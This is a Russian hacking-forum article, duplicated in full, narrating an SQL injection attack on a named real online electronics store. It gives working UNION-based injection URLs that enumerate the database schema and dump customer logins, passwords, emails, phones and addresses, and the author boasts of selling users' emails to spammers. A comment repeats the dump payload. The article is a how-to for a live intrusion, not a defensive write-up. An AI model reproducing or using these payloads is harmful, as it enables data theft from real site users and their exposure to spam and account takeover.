Взлом интернет магазина — HackZona.Ru
Взлом интернет магазина
Взлом интернет магазина
Тип статьи:
Со старой ХакЗоны.
Источник:
В мире есть две категории админов: Хорошие(которые не связываются с windows) и криворукие(которые ставят windows+asp.net).
[Начало]
От нечего делать я зашёл в гугло и забил в поиск интернет магазин site:ru
filetype:aspx. Результатов было много, я зашёл в магазин www.chipdip.ru
и в поиске по сайту вбил 1' на что он мне ответил «Строка для поиска слишком
мала. Используйте не менее 3-х символов!», в адресной строке браузера был
адрес www.chipdip.ru/search.aspx?searchtext=1%27&x;=0&y;=0, я сделал
такой линк www.chipdip.ru/search.aspx?searchtext=1'[email protected]@version--,
Он мне с готовностью выплюнул «Conversion failed when converting the nvarchar
value 'Microsoft SQL Server 2005 — 9.00.3068.00 (Intel X86) Feb 26 2008 18:15:01
Copyright © 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2
(Build 3790: Service Pack 2) ' to data type int.»
[Кража инфы]
Далее я подсчитал количество столбцов(4) и сделал такой линк
«http://
www.chipdip.ru/search.aspx?searchtext=1'+union+select+1,table_name,3,4+from
+information_schema.tables--»
все таблички были у меня перед глазами, но на
такой запрос мне выдало ошибку
«www.chipdip.ru/search.aspx?searchtext=1'+union+select+1,table_name,3,column_name+from+information_schema.columns--»
пришлось идти другим путём,
«www.chipdip.ru/search.aspx?searchtext=-1'+union+select+1,cast(table_name+as+nvarchar)%2bchar(58)%2bcolumn_name+%2bchar(58)%2btable_name%2bchar(58)%2bcast(column_name+as+nvarchar),3,4+from+information_schema.columns--»
на такой запрос сервер выдал имена табличек: имена полей.
Посмотрев имена табличек я нашёл такую CHI_WebClients, и поля в ней
(Login,LastName,Email,FirstName,INN_RU,KPP_RU,
last_update,MiddleName,Name,Password,Phone,Street,TeleFax)
Запросом
«www.chipdip.ru/search.aspx?searchtext=-1'+union+select+1,cast(Login+as+nvarchar)%2bchar(58)%2bPassword%2bchar(58)%2bcast(Email+as+nvarchar)%2bchar(58)+%2bPhone+%2bchar(58)+%2bStreet,3,4+from+CHI_WebClients--»
я вытащил логин: пароль: мэйлЖНомер телефона: адрес.
Страничка грузилась минут 30 не меньше, клиентов там видимо было не меньше
миллиона, сохранив страничку я начал искать аккаунт с правами админа, в поиск
по страничке вбил admin на что болучил полста результатов, проверять все акки
было реально в лом, и я просто продал адреса ящиков юзеров спаммерам.
-----------------------------------------------------------------------------------------------------
[Начало]
От нечего делать я зашёл в гугло и забил в поиск интернет магазин site:ru
filetype:aspx. Результатов было много, я зашёл в магазин www.chipdip.ru
и в поиске по сайту вбил 1' на что он мне ответил «Строка для поиска слишком
мала. Используйте не менее 3-х символов!», в адресной строке браузера был
адрес www.chipdip.ru/search.aspx?searchtext=1%27&x;=0&y;=0, я сделал
такой линк www.chipdip.ru/search.aspx?searchtext=1'[email protected]@version--,
Он мне с готовностью выплюнул «Conversion failed when converting the nvarchar
value 'Microsoft SQL Server 2005 — 9.00.3068.00 (Intel X86) Feb 26 2008 18:15:01
Copyright © 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2
(Build 3790: Service Pack 2) ' to data type int.»
[Кража инфы]
Далее я подсчитал количество столбцов(4) и сделал такой линк
«http://
www.chipdip.ru/search.aspx?searchtext=1'+union+select+1,table_name,3,4+from
+information_schema.tables--»
все таблички были у меня перед глазами, но на
такой запрос мне выдало ошибку
«www.chipdip.ru/search.aspx?searchtext=1'+union+select+1,table_name,3,column_name+from+information_schema.columns--»
пришлось идти другим путём,
«www.chipdip.ru/search.aspx?searchtext=-1'+union+select+1,cast(table_name+as+nvarchar)%2bchar(58)%2bcolumn_name+%2bchar(58)%2btable_name%2bchar(58)%2bcast(column_name+as+nvarchar),3,4+from+information_schema.columns--»
на такой запрос сервер выдал имена табличек: имена полей.
Посмотрев имена табличек я нашёл такую CHI_WebClients, и поля в ней
(Login,LastName,Email,FirstName,INN_RU,KPP_RU,
last_update,MiddleName,Name,Password,Phone,Street,TeleFax)
Запросом
«www.chipdip.ru/search.aspx?searchtext=-1'+union+select+1,cast(Login+as+nvarchar)%2bchar(58)%2bPassword%2bchar(58)%2bcast(Email+as+nvarchar)%2bchar(58)+%2bPhone+%2bchar(58)+%2bStreet,3,4+from+CHI_WebClients--»
я вытащил логин: пароль: мэйлЖНомер телефона: адрес.
Страничка грузилась минут 30 не меньше, клиентов там видимо было не меньше
миллиона, сохранив страничку я начал искать аккаунт с правами админа, в поиск
по страничке вбил admin на что болучил полста результатов, проверять все акки
было реально в лом, и я просто продал адреса ящиков юзеров спаммерам.
-----------------------------------------------------------------------------------------------------
8 комментариев
"и от нечего делать..."
так всё и начинается:))
"http://www.chipdip.ru/search.aspx?searchtext=-1'+union+select+1,cast(Login+as+nvarchar)%2bchar(58)%2bPassword%2bchar(58)%2bcast(Email+as+nvarchar)%2bchar(58)+%2bPhone+%2bchar(58)+%2bStreet,3,4+from+CHI_WebClients--"